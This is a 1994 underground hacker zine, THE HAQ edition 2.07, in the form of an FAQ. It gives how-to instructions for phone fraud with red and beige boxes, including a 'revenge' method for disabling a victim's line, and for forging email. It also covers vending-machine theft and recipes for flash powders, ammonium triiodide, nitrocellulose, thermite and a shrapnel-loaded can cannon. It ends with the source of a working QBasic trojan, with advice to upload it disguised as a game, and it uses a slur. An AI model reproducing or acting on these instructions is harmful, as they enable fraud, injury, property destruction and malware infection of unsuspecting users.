home *** CD-ROM | disk | FTP | other *** search
- **
- Jun 13, 1994 19:54 from Belisarius
-
-
- _____________
- / / / *** *** ****** ******
- / *** *** ********* *********
- / / *** *** *** *** *** ***
- / / *********** *********** *** ***
- / /_____ ______ *********** *********** *** ** ***
- / / / /_____/ *** *** *** *** *** *****
- / / / / *** *** *** *** ***********
- / / / /______ *** *** *** *** ***** ***
-
-
- +---------------+
- | THE HAQ |
- | Edition 2.07 |
- | 11 JUN 1994 |
- +---------------+
-
-
-
- "Knowledge is power" --Francis Bacon
- "United we stand, divided we fall" --Aesop
-
-
- =+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
- = =
- + MatrixMage Publications. 1994 No rights reserved. +
- = =
- + This file may be redistributed provided that the file and this +
- = notice remain intact. This article may not under any =
- + circumstances be resold or redistributed for compensation of any +
- = kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
- + +
- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
-
-
- <*> Edited by <*>
-
-
- # Editor-in-Chief #
- Belisarius < temporary loss of E-mail >
- can be reached on ISCA, Shadow, SkyNET, Brinta and
- Baltimore 2600 Meetings and other nameless locations.
-
-
- # Asst. Editor (non communicado) #
- Neurophire (on Shadow and N P on ISCA)
-
-
- A MatrixMage Electronic Publication
-
-
- Special Thanks to the Following Contributors:
- Z Maestro RA of ISCA Underground>
- DINO RA of Shadow Hack and Crack>
- Artimage RA of SKYNET Underground>
-
- Faunus Revolution Miska Informatik
- Matrixx Amarand Crypto Steelyhart aBBa / PfA
- Beelzebub Redbeard Squarewave
- IO CyberSorceror Caustic
- Doktor Nil Skipster Walrus
- CPT Ozone Abort Kyoti
- Carsenio Aero Phrack
-
-
- AND NOW A WORD FROM YOUR EDITOR:
-
- Throughout history mankind has been afraid of the unknown.
- Before lightning could be scientifically explained it was blamed on
- the anger of the gods. This belief in mysticism persisted throughout
- the ages (and still does today). Later as man acquired simple herbal
- and chemical knowledge, these men were revered as mages, users of
- mystical arts derived from the old gods. But as organized religion
- (i.e. Christianity especially Roman Catholicism) spread and came to
- dominate society (became the powers that be), the mage was no longer
- revered. The mage (who only sought to understand the world around
- himself and make the world a better place) was persecuted, attacked
- and driven underground by the church. But driving these mages
- underground (out of society) did not stop there ideas from spreading
- or them from continuing to work. The church label Copernicus as a
- heretic and mage and only this century has the Roman Catholic church
- accepted his principles (heliocentric universe) as fact.
- So are 'hackers' the same today. We surf the nets seeking
- knowledge and information (and hopefully understanding). Information
- and understanding the meaning and import of the information are the
- two greatest commodities and bases of power in the world today.
- These things are easy to disseminate and gather in the electronic
- world. The matrix (cyberspace/web/net [whichever term you choose]
- is able to influence and control information faster and better than
- ever before. This makes many afraid of the cyberculture (not to
- mention a deep-seated techno-fear of many people, anything new and
- technical is bad).
- We are a new breed of mage; seeking knowledge, desiring
- understanding, persecuted by the powers that be. This is why I have
- started this publication. We are the MatrixMages! Our mission is
- to learn and to pass on that knowledge.
-
- -=> Belisarius <=-
- *********************************************************************
- What is 'Cyberpunk' and the Underground?
-
- "Every time I release a phile, or write an article for a zine, it's
- vaguely like a baby. It gets stored, and copied, and sent out all
- over the world, and people read it. It goes into their minds.
- Something I created is buried in living tissue and consciousness
- someplace. Eventually somebody uses it, and I know that I have the
- power to change the world. Somewhere, someplace, somebody changed
- something using information I changed or created. I helped to
- change the world." --Unknown
-
- That is the attitude of many of the people who, knowingly or not, are
- members of this hyped/wired/cyber culture. Some who may read this
- will see some of their undefined beliefs, hopes and feelings
- reflected in the above quote. And, as the quote says, they will
- help spread it. Somewhere, somehow, that quote will change the
- world.
-
- But only if you work to change it. Remember that information and
- knowledge a powerful commodities. He who has information cannot
- be beaten. So above all the most important thing to do in the
- "Underground" is to gather information. This means that you have to
- work and put in some effort. You don't get something' for nothing!
- So work hard and together we can change the world!
-
- Keep up with latest editions. (Sorry there haven't been many lately
- but exams and not failing out took precedence!)
-
- The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
- or any contributor are not responsible for any consequences.
- You use this information at your own risk.
-
- *********************************************************************
- CONTENTS
- *********************************************************************
- Sections
- I. Phone Fun
- (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
- II. Fake E-Mail
- (Fooling UUCP)
- III. Social Engineering
- (Free sodas, Dumpster Diving, ATMs, Carding)
- IV. The Big Bang
- (Making Weapons and Explosives)
- V. Infection
- (Virii, Trojans, Worms and other creepy crawlies)
- VI. NEWBIES READ THIS
- (Basic Hacking)
- VII. Screwing with the most widespread operating system on the net
- (UNIX / AIX Hacking)
- VIII. Screwing with the most secure operating system on the net
- (VAX/VMS Hacking)
- IX. Screwing with the most widespread operating system on PCs
- (MS-DOS Hacks)
- X. Finding out what that encrypted info is
- (Cracking programs)
- XI. How do I keep my info secure
- (PGP / Cryptology)
- XII. Chemistry 101
- (explosive/pyrotechnic component prep)
- XIII. Fun things with solder, wires, and parts
- (Underground electronics)
- XIV. Watching television
- (cable, Pay-Per-View(PPV), scrambling)
- XV. Tuning in to what's on the radio waves
- (Radios and Scanning)
-
- Appendices
- A. FTP sites with useful info
- B. Interesting Gophers
- C. Informative USENET Newsgroups
- D. Publications and Zines
- E. Books
- F. Files and Papers
- G. Cataglogs
- H. PGP Keys
- *********************************************************************
-
-
- =====================================================================
- I. Phone Fun
- (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
-
- WHAT IS A RED BOX AND HOW DO I MAKE ONE?
- (from Doktor Nil)
-
- First note: a redbox is merely a device which plays the tone a
- payphone makes when you insert money. You just play it through the
- mike on the handset. You would think that the Phone Co. would mute
- the handset until you put a quarter in, and perhaps they are starting
- to build phones like that, but I have yet to see one.
-
- What you need:
- - Radio Shack 33 memory Pocket Tone Dialer
- - 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
- below)
- - A solder gun.
- - Someone who can point out the crystal in the Tone
- Dialer.
-
- Instructions:
- 1) Open up the back of the tone dialer. Use screwdriver.
-
- 2) Locate crystal. It should be toward the right side.
- It will be smaller than the 6.5 MHz one you bought, but otherwise
- vaguely similar. It is basically capsule-shaped, with two electrodes
- coming out of the bottom which are soldered onto a circuit board.
- It's on the _left_ side, basically the third large crystal thing from
- the bottom, about 1.5 cm long, metallic, thin.
-
- 3) De-solder, and de-attach, crystal. Heat the solder that the
- crystal is seated in; remove crystal.
-
- 4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
- is already there from the old crystal, that way there is less chance
- of you dropping hot solder somewhere it shouldn't be and losing
- everything. Heat first one drop of solder with the solder gun, and
- seat one electrode of the 6.4 MHz crystal in it, then do the same
- with the other. This is the easiest part to mess up, be careful that
- both drops of solder don't run together.
-
- 5) Put cover back on. you are done.
-
-
- How to use: Five presses of the "*" key will make the quarter sound.
- I think fewer presses make nickel/dime sounds, but I can't remember
- specifically. Here in Michigan, you can simply hold it up to the
- handset and press memory recall button 1 (where you have conveniently
- recorded five *'s -read the tone dialer directions on how to do this)
- and get a quarter credit, _IF_ you are calling LD. Keep making the
- tone to get additional credits. There is a maximum number of credits
- you can have at once.
-
- To make a local call this may not work. You need to first put in a
- real coin, then you can use the redbox for additional credits. There
- may be a way around this, however: Call the operator, and ask her to
- dial your number for you. She should do this without asking why, it
- is a regular service. If you need an excuse, say the "4" key isn't
- working, or something. She will ask you to insert your money. At
- this point use the redbox. If all goes well, she dials your number
- and you're in business. If she says "Will you do that one more time,"
- or "Who is this," or any variations, hang up and walk away.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHAT DO THESE CRYSTALS LOOK LIKE?
- In most cases, a rectangular metal can with two bare wires coming out
- of one end, and a number like "6.50000" stamped on one side.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
- (from Matrixx)
- 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
- is the easiest to find (Radio Shack)
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
- The crystals are available from Digi-Key. Call 1-800-DIGIKEY
- (1-800-344-4539) for more info. The part order number from
- DIGI-KEY is x-415-ND
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
- (from DINO)
- For a Radio Shack conversion red box: a nickel is one * and a quarter
- is 5 *'s
-
- Here are the freqs for a red box:
-
- $.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
- with 33 millisecond pause between each pulse
- $.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
- millisecond pauses
- $.05 one pulse at the above freqs for 66 milliseconds!
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
- (from Faunus, Carsenio)
- If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
- is a general term for Customer owned or "Bell-independent" phone
- companies. Sometimes they are more shabbily constructed than real
- fortress phones but others look about the same except for a lack of
- phone company logo.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- FOOLING COCOTS USING 800 NUMBERS?
- You call up an 800 number as any public phone HAS too let you dial
- 800 numbers for free. Then you let the person who answers the 800
- number hang up on you, THEN you dial your number that you want to
- call free. OK MOST COCOTs disable the keypad on the phone so you
- CANT just dial the number, you have to use a pocket tone dialer to
- dial the number.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW DO I MAKE A BEIGE BOX?
- (from Neurophyre)
- Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
- clips, ratchet wrench, 7/16-inch hex head
-
- 1. Cut the head off one end of the phone cord.
- 2. Strip the coating back about two (2) inches.
- 3. Look for the red wire, and the green wire.
- 4. Mark one clip green and put it on the green.
- 5. Mark the other red and put it on the red.
- 6. Once you have them soldered and insulated, plug the other end
- (that still has the head) into a phone.
- 7. Go out in the daytime and look for green bases, green rectangular
- things sticking about 3 feet out of the ground with a Bell logo on
- the front. If you're a lamer, you'll waste your time with a
- cable company box or something. I've heard of it.
- 8. Come back to a secluded one at night. With the wrench, open it
- up.
- 9. Find a set of terminals (look like the threaded end of bolts
- in my area) with what should be a red wire and a green wire
- coming off them.
- 10. Plug in your beige box red to red and green to green, pick up the
- phone and dial away!
-
- Modems work too as well as taps and shit. You're using someone
- else's line (unless you're an idiot) to get phone service. Don't
- abuse the same line after the phone bill comes.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- BEIGE BOXING 101
- Field Phreaking
- by Revolution
-
- At the beginning of the section in the Bell training manual
- entitled "One million ways to catch and fry a phreak" it doesn't
- have a disclaimer saying "for informational purposes only". So why
- the hell should I put one here? Give this file to whoever you want,
- just make sure it all stays together, same title, same byline.
-
- Field phreaking gives you everything you've ever wanted: free
- long distance calls, free teleconferencing, hi-tech revenge, anything
- you can do from your own phone line and more, without paying for it,
- or being afraid of being traced. Just be ready to bail if you see
- sirens.
-
- How to make a beige box: Easiest box to make. Cut your phone cord
- before the jack, strip the wires a little. You should see a red
- (ring) wire and a green (tip) wire. If you see yellow and black
- wires too just ignore them. Put one set of alligator clips on the
- red wire and one on the green wire, and you're set. (You want to
- use your laptop computer, but you don't want to ruin your modem's
- phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on
- the back, and do the same thing as above. Now you can use a phone,
- laptop, anything you can plug in a jack.)
-
- How to use: What you have is a lineman's handset. You can use it
- from any bell switching apparatus (from now on sw. ap.). These are
- on phone poles, where your phone line meets your house, and near
- payphones. I'll go into detail below, but basically just open any
- box on a telephone pole, and you'll see sets of terminals (screws),
- with wires wrapped around them, just like on the back of a phone
- jack. These screws are where you need to attach your alligator
- clips to get a dial tone. Don't unscrew the screw, you'll just
- fuck up some poor guys line, and increase your chances of getting
- caught. After the wire goes around the screw, it normally twists
- off into the air. Put your clip on the end of the wire. Do the
- same with the other clip. If you don't get a dial tone, then
- switch terminals.
-
- On telephone poles:
-
- TTI terminals: These must have been built by phreaks, just for
- beige boxing. By far the easiest sw. ap. use. The only drawback
- is that they only connect to one phone line. These are the fist
- sized gray or black boxes that appear where a single phone line
- meets the mother line. They look almost like outdoor electric
- sockets, that have the snap up covering. They normally have the
- letters TTI somewhere on the front. No bolts or screws to take
- off, just snap up the top and you will see four screws. Clip in
- and happy phreaking. Just click the top down and no one will ever
- know you were there (except for the extra digits on their phone
- bill.)
-
- Green trees: just about the hardest sw. ap. to beige from (tied
- with the bell canister) but if its the only one you can use, go for
- it. These are the 3 foot high green/gray metal columns that are no
- wider than a telephone pole (which makes them different then the
- green bases, see below), that say "Call before digging, underground
- cable," or the real old ones just have a bell sign. Usually green
- trees are right at the base of phone poles, or within a foot or two
- of them. These normally have two 7/16 bolts on one side of the
- column, which have to be turned 1/8 a turn counterclockwise, and
- the front of the base will slide off. Now you will see a sheet of
- metal with a few square holes in it, that has a bolt where the
- doorknob on a door would be. Ratchet this one off and the metal
- sheet will swing open like a door. On one side of the sheet will
- be a paper with a list of #'s this tree connects to. Inside you'll
- see a mass of wires flowing from gray stalks of plastic in sets of
- two. The whole mass will have a black garbage bag around it, or
- some type of covering, but that shouldn't get in the way. The
- wires come off the gray stalk, and then attach to the screws that
- you can beige from, somewhere near the ground at the center of the
- tree. These are on a little metal column, and sometimes are in a
- zig-zag pattern, so its hard to find the terminals that match in
- the right order to give you a dial tone.
-
- Green bases: The gray/green boxes you see that look just like green
- trees, except they are about twice or three times as wide. They
- open the same as trees, except there are always 4 bolts, and when
- the half slides off, inside is a big metal canister held together
- with like 20 bolts. I wouldn't open it, but with a little info
- from friends and some social engineering, I learned that inside is
- where two underground phone lines are spliced together. Also inside
- is either pressurized gas or gel. Pretty messy.
-
- Bell canisters: attached to phone poles at waist level. They are
- green (or really rusted brown) canisters about a two feet tall that
- have a bell insignia on the side. They will have one or two bolts
- at the very bottom of the canister, right above the base plate.
- Take the bolts off and twist the canister, and it'll slide right
- off. Inside is just like a green tree, except there normally isn't
- the list of #'s it connects to.
-
- Mother load: Largest sw. ap. A large gray green box, like 6 x 4,
- attached to a telephone pole about three feet off the ground. a big
- (foot or two diameter) cable should be coming out the top.
- Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
- cabinet with double doors. Fasteners are located in the center of
- the box and on the upper edge in the center. Both of these are
- held on with a 7/16 bolt. Take the bolts off, and swing the doors
- open. On the inside of the right door are instructions to connect
- a line, and on the inside of the left door are a list of #'s the
- box connects to. And in the box are the terminals. Normally 1,000
- phones (yyy-sxxx, where yyy is your exchange and s is the first
- number of the suffix, and xxx are the 999 phones the box connects
- too).
-
- On houses: follow the phone line to someone's house, and then down
- there wall. Either it goes right into there house (then you're
- screwed) or it ends in a plastic box. The newer boxes have a screw
- in the middle, which you can take off with your fingers, and then
- put the box back on when you're done, but the older ones are just
- plastic boxes you have to rip off. Inside are 4 terminals, yellow,
- black, and red and green, the two you need. Find the Christmas
- colors, and phreak out.
-
- On payphones: follow the phone line up from the phone, and sometimes
- you'll find a little black box with two screws in it. Undo this,
- and you'll find a nice little phone jack. You don't even need your
- beige box for that one. If there's not one of those, follow the
- wire to a wall it goes into, and sometimes there will be a sw. ap.
- like those on houses (see above). Payphones are normally pretty
- secure now though, and you probably won't find any of those.
-
- Phreaky things you can do: Jesus, do I have to tell you lamers
- everything? Anyway, free long distance calls should be pretty easy,
- and get teleconferencing info from somebody else, just make sure
- you ANI the # you're calling from before calling Alliance.
-
- Hi-tech revenge!
- Possibilities are endless, you have total control of this lamers
- line. Most of you guys are probably way to elite for this one, but
- you can disconnect his line by loosening a few screws and ripping
- his wires at any sw. ap. but here's something a lot better: Get the
- faggots number, and then find the mother load sw. ap. it connects
- to (not the sw. ap. on his house or on the telephone pole in his
- drive way, the _mother_load_) Find his # in the terminals, and then
- connect the two terminals with a paper clip or an alligator clip! His phone
- will be busy until ma bell
- figures out what the hell is going on, and since the last place
- they look is the mother load, this usually is at least a week.
- Then, of course, is the funniest prank: Beige box from a major
- store, like Toys R Us (that's my favorite) and call up ma bell
- "Yeah, I'd like all calls to this number forwarded to (his
- #)"
-
- That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
- phunk on IRC, or Revolution on Delphi. Any phreaks out there who
- got new info, war stories or some addictive disorder and just need
- somebody to talk to, E-mail revolution@delphi.com no PGP needed.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHAT PHONE NUMBER AM I CALLING FROM?
- (from Skipster, et al)
-
- This service is called ANI.
-
- This number may not work, but try it anyway:
- (800) 825-6060
-
- You might want to try is dialing 311 ... a recorded message tells you
- your phone #. Experiment, but 311 does work, if it doesn't and an
- operator picks up, tell her that you were dialing information and
- your hand must have slipped.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW DO I USE/DO ALLIANCE TELECONFERENCING?
- (from Neurophire, Carsenio)
- Set one of these up, it is a 1-800 dial-in conference. Then, grab
- your beige box, go to some business, preferably something like a
- Wal-Mart or a Radio Shack and beige box off their line. Then call
- and set up a teleconference for whenever to be billed to the line
- you are calling from. You'll want to know specifically what to ask
- for. Alliance teleconferencing is 0-700-456-1000.
- Dial the number (you're of course paying for this by the minute)
- and you get automated instructions on how to choose the number of
- ports for your conference call, and how to dial each participant..
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
- (from Token)
- Just scroll through your favorite business magazine and look for
- 800#s. Once you get a VMB system you can look for a box being used
- and try the default passcodes <0000> , <9999> , etc. Like on the
- INet, most people are too dumb to change their passwd. If you're
- lucky you might get the root box (I did, the stupid ass's passwd
- was <4321>).
-
-
- =====================================================================
- II. Fake E-mail
- (Fooling UUCP)
-
- HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
- (from Beelzebub, Doktor Nil w/ Belisarius)
-
- 1. Telnet to port 25 of any internet server
- (eg. telnet site.name.and.address 25)
- 2. If at all possible, AVOID TYPING "HELO".
- 3. Type: rcpt to (person to receive fake mail){ENTER}
- 4. Type: mail from (fake name and address){ENTER}
- 5. The mail server should ok each time after each name.
- 6. If it does not:
- a) type vrfy and then the name of the person
- b) as a last resort use helo, this will login your computer as
- having been the source of the mail
- 7. Retype the commands, it should say ok now.
- 8. Type: data{ENTER}
- 9. The first line of the message will be the Subject line
- 10. Enter your letter
- 11. To send letter type a "." on an empty line.
- 12. Then type quit{ENTER}
- 13. This is traceable by any sysadmin ... don't harass people this
- way.
- 14. If the person receiving the mail uses a shell like elm he/she
- will not see the telltale fake message warning
- "Apparently-To:(name)" even if not, most people wouldn't know
- what it means anyway.
- 15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
- so as to make it look more believable and cover any add-ons the
- mail routine might try
- 16. Put a realistic mail header in the mail message to throw people
- off even more. If there are To: and Date: lines then the
- program probably won't add them on.
- 17. Also try to telnet to the site where the recipient has his
- account. This works better if you know how to fool it.
-
- =====================================================================
- III. Social Engineering
- (Free sodas, Dumpster Diving, ATMs, Carding)
-
- WHAT DOES SALTING VENDING MACHINES DO?
- When you take concentrated salt water (a high concentration of salt)
- and squirt it into the change slot (preferably where the dollar
- bills come in, though some say it doesn't matter), the salt will
- short circuit the machine and out will pour change and hopefully
- sodas.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- ANOTHER WAY OF GETTING FREE SODAS?
- This is an easier and actually more reliable way of getting free
- sodas. It only wprks pn spme machines though, usually Coca-Cola.
- Anyways, put in your change and as the last coin goes down the slot
- start rapidly and repeatedly pressing the button of your choice.
- If everything works well, then you should get two sodas and your
- change back.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW ARE THE TRACKS OF ATM CARD ARRANGED?
-
- The physical layout of the cards are standard. The logical arrangement
- of the data stored on the magnetic strip varies from institution to
- institution. There are some generally followed layouts, but not
- mandatory.
-
- There are actually up to three tracks on a card.
-
- Track 1:
- Designed for airline use. Contains name and possibly your account
- number. This is the track that is used when the ATM greets you
- by name. There is alot of variation in how things are ordered so
- occasionally you get 'Greetings Q. John Smith' or
- 'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
- This track is also used
- with the new airline auto check in (PSA, American, etc).
-
- Track 2:
- The main operational track for online use. The first thing
- on the track is the Primary Account Number (PAN). This is usually
- pretty standard for all cards. Some additional info might be on the
- card such as expiration date.
- One interesting item is the PIN (Personal Identification Number)
- offset. When an ATM verifies a PIN locally, it usually uses an
- encryption scheme involving the PAN and a secret KEY. This gives you
- a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
- generated). If you want to select your own PIN, they would put the
- PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
- the Natural PIN plus the offset, and you have the selected PIN.
- The PIN is never in the clear on your card. Knowing the PIN OFFSET
- will not give you the PIN. This will require the SECRET KEY.
-
- Track 3:
- The "OFF-LINE" ATM track. It contains information such as your daily
- limit, limit left, last access, account number, and expiration date.
- The ATM itself could have the ability to write to this track to
- update information.
-
- =====================================================================
- IV. The Big Bang
- (Making Weapons and Explosives)
-
- FLASH POWDERS:
- (from Neurophyre)
-
- Materials: Powdered magnesium, powdered potassium nitrate
- 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
- nitrate.
- 2. Light it with a long fuse cuz its so bright it might screw up your
- eyes.
-
- REAL Cherry Bomb Powder
- 4 parts by weight of potassium perchlorate
- 1 part by weight of antimony trisulfide
- 1 part by weight aluminum powder
-
- Relatively Safe
- 3 parts by weight of potassium permanganate
- 2 parts by weight of aluminum powder
-
-
- *VERY* Shock/Friction/Static/Heat Sensitive!
- Use only if suicidal or desperate!
- 4 parts by weight of potassium chlorate
- 1 part by weight of sulfur
- 1 part by weight of aluminum powder
-
- 1) To use these mixtures, SEPARATELY pulverize each ingredient into a
- fine powder, the finer it is, the more power you get. Use a mortar and
- pestle if available, and grind GENTLY. Do not use plastic as this can
- build a static charge. Remember, do them SEPARATELY.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- AMATEUR EXPLOSIVE (Ammonium Triiodide):
- (from IO)
- WARNING: This explosive is EXTREMELY shock sensitive when dry, and
- moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
- The purplish iodine vapor this produces during the explosion will stain
- and corrode!
- 1) Take a small plastic bucket, add 3-4 inches of household ammonia.
- This bucket will never be clean again, in all likelihood.
- Try to get clear (non-pine, non-cloudy) ammonia. Or use an
- ammonium hydroxide solution from a chemlab. This results in better
- but more sensitive, and therefore dangerous crystals.
- 2) Drop in iodine (like you use on scratches) one drop at a time, or,
- preferably, use crystals of iodine.
- 3) Let it settle, then pour it through a piece of cloth, discarding
- the runoff.
- 4) Squeeze *gently* to get out excess liquid.
- 5) Mold it onto the thing you want to blow up, stand **way** back.
- 6) Wait for it to dry, and throw a rock at it.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW TO BUILD A TENNIS BALL CANNON?
- 1. Get six (6) tin cans.
- 2. From five of them remove the tops and bottoms.
- 3. From the last one remove only the top. (this is the last can to
- make the breach)
- 4. The cans should overlap and be fit together to make a long barrel
- closed at one end and open at the other.
-
- ___________________________________
- open --> ()____)_____)_____)_____)_____)_____) <--closed
- (barrel) 1 2 3 4 5 6 (breach)
-
- 5. Duct tape all of the cans together. USE LOTS OF TAPE!!
- 6. Put some gunpowder in the bottom of the CANnon.
- 7. Aim, brace the CANnon.
- 8. Spray hairspray or pour alcohol on the tennis ball and light.
- 9. Drop the ball into the can and STAND BACK!
-
- Other ideas:
- a) Make explosive tennis balls.
- b) Launch potatoes.
- c) Launch thumbtacks, nails, broken glass, etc.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
- (from Terrorist's Handbook)
- Materials: cotton, concentrated nitric acid, concentrated sulfuric
- acid, distilled water
-
- Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
- litmus paper
-
- Procedure: 1. Pour 10mL of sulfuric acid into beaker.
- 2. Pour 10mL of nitric acid into beaker with sulfuric
- acid.
- 3. Immediately add 0.5 gram of cotton.
- 4. Allow it to soak for EXACTLY three(3) minutes.
- 5. Remove the nitrocellulose.
- 6. Put the nitrocellulose into a beaker of distilled
- water to wash it in.
- 7. Allow the material to dry.
- 8. Re-wash it.
- 9. Once neutral(acid/base) it can be dried and stored.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- WHAT IS THERMITE AND HOW DO I MAKE IT?
- Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
- and can be used to burn through most anything.
-
- Materials: powdered aluminum, powdered iron oxide
-
- Procedure: mix the two powders together as evenly as possible
-
- Ignition: thermite is difficult to ignite but these work
- a) mix a small amount of potassium chlorate into the
- thermite mixture and ignite with a few drops of
- sulfuric acid
- b) magnesium strip or 'sparkler' stuck into the powder
- which is then lit as a fuse
-
- =====================================================================
- V. Infection
- (Virii, Trojans, Worms and other creepy crawlies)
-
- WHERE CAN I GET SOME VIRII?
- The Virus eXchange BBS in Bulgaria. [number not available - :( ]
- Problem: They demand a virus they don't have in their archives to
- let you in. Good luck finding one. The best way is to write one,
- even if it's in BASIC. It'll probably get you in. They have
- THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
- from what I know! For more info, gopher to wiretap.spies.com and dig
- around in their online library under technical info.
-
- There are alot of places in the US to get virii too:
- The Hell Pit in Chicago has over 1500, and they don't accept the
- lame stuff like the ones written in basic, so they're all good ones.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- INTS USED:
- (from Belisarius)
- You want Int 18h, AH=03h,
- Al==Num sectors to write
- BX==offset of pointer to buffer
- CH=cylinder Number
- Cl=sector number
- DX=head number
- Dl=drive numbers
- ES=segment of pointer with buffer
-
- for CH=it's the low 8 bits of 10 bit cylinder number,
- for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
- 0-5=sector number.
- for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
- AH=status, AL=number of sectors written flags, carry set if an error.
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-
- SAMPLE OF A TROJAN
- (from Spear)
-
- This is a little trojan I wrote in Qbasic 4.5 It's a bitch!
-
- REM bitch by Spear
- color 14,0
- print"installing datafiles... Please wait..."
- print"This may take up to 20 minutes, depending on your computer..."
- shell "cd\"
- for a = 1 to 100000
- a$=str$(a)
- c$="md" + a$ + ".hee"
- shell c$
- next a
- cls
- print"Cybermattixx Version 1.0 is now installed on your system..."
- print"Have a shitty day!"
- print " ?AM?"
- print
- input "Hit ENTER To REBOOT your System now!";a$
- shell "boot.com"
-
- How to use it?
- This can pose as the installation program for a game. This means that
- when you upload it to a BBS or something, and post that it is a
- kickass game, people will download it and try to install it on their
- computers!
-
- What does it do?
- This program changes directory to the root and makes 100000 dirs in
- the root. You cannot use deltree to wipe them out in one chunk and
- you CANNOT get rid of them without doing reverse engineering on the
- program, ie. rd instead of md. To get rid of them any other way you
- would have to format c: or d:
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=
-
- -=*( Prophet )*=-
- ____ __ __
- / __ \_________ ____ / /_ ___ / /_ The Truth Is Out There...
- / /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/
- / ____/ / / /_/ / /_/ / / / / __/ /_ Trust No-One...
- /_/ /_/ \____/ .___/_/ /_/\___/\__/
- /_/ Do Not Fear The Reaper,
- prophet@illumini.demon.co.uk Fear Your God-Damn Government
-